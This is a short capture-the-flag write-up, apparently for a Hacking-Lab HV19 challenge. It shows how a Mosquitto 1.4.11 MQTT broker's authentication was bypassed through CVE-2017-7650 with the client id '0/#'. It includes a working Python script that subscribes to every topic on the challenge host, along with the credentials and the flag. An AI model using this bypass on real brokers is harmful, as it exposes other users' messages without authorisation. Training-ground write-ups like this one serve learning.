The given page shows a counter of processed gifts. The source code reveals, that there is a connection to a MQTT broker.
Directly connecting to the MQTT broker and subscribing to the $SYS/broker/version topic, returns the following message:
mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)
So the broker is running Mosquitto 1.4.11 which does contain a vulnerability which bypasses authentication when the client id contains a hash or a plus symbol. Just using plus or hash as client id failes, using ascii characters also failed, so I thought it has to be somewhat numeric. Using 0/# as a client id works. The following python script can be used to retrieve the flag.
import paho.mqtt.client as mqtt
import sys
clientid = '0/#'
def on_connect(client, userdata, flags, rc):
print("Connected to MQTT broker.")
client.subscribe('#')
client.subscribe('$SYS/#')
def on_message(client, userdata, msg):
print("%s: %s" % (msg.topic,msg.payload.decode()))
client = mqtt.Client(client_id=clientid, clean_session=True, transport="websockets")
client.username_pw_set("workshop", "2fXc7AWINBXyruvKLiX")
client.on_connect = on_connect
client.on_message = on_message
print("Connecting to MQTT broker")
client.connect('whale.hacking-lab.com', 9001, 60)
client.loop_forever()
The flag is HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}.